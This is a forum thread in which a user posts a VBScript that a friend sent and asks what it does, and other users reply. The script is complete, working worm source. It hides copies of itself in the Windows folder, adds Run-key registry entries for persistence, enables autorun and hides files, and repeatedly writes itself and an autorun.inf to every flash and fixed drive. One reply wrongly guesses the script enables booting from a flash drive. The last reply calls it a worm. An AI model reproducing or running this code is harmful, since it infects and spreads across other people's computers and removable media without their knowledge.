What is the function of this VB script

Peter_APIIT's Avatar, Join Date: Apr 2007
Contributor
Hello every web developer expert, i have a program sent by my friends to me. Its keep on running in hidden mode or backgroud.

Therefore, i wonder whether this program will affected my pc overall perforamnce.

Below is the VB script code:
Code:
'mark
'slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
set rg = createobject("WScript.Shell")
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
dim text,size
size = mf.size
set text=mf.openastextstream(1,-2)
cc = text.readline
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\.MS32DLL.dll.vbs",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
tf.attributes = 39
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "\boot.ini")
tf.attributes = 39
if cc = "'mark" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
if cc = "'marker" then
rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
do
for each flashdrive in fs.drives
hm="'mark"
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
if(flashdrive.drivetype=2) then
hm = "'marker"
end if
set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\.MS32DLL.dll.vbs",2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
rg.R
egWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
next
if cc <> "'mark" then
Wscript.sleep 10000
end if
loop while cc <> "'mark"
Any help, opinion, idea, recommendations is greatly aprpeciated by me and others.
0
pradeep's Avatar, Join Date: Apr 2005
Team Leader
This script enables booting from a flashdrive, that's my best guess!
0
Peter_APIIT's Avatar, Join Date: Apr 2007
Contributor
Is it a file uses to remote access others computer and monitor others computer booting ?
I just guess.
0
shadowskill404's Avatar, Join Date: Jul 2007
Go4Expert Member
Its a worm... I got one too... hehe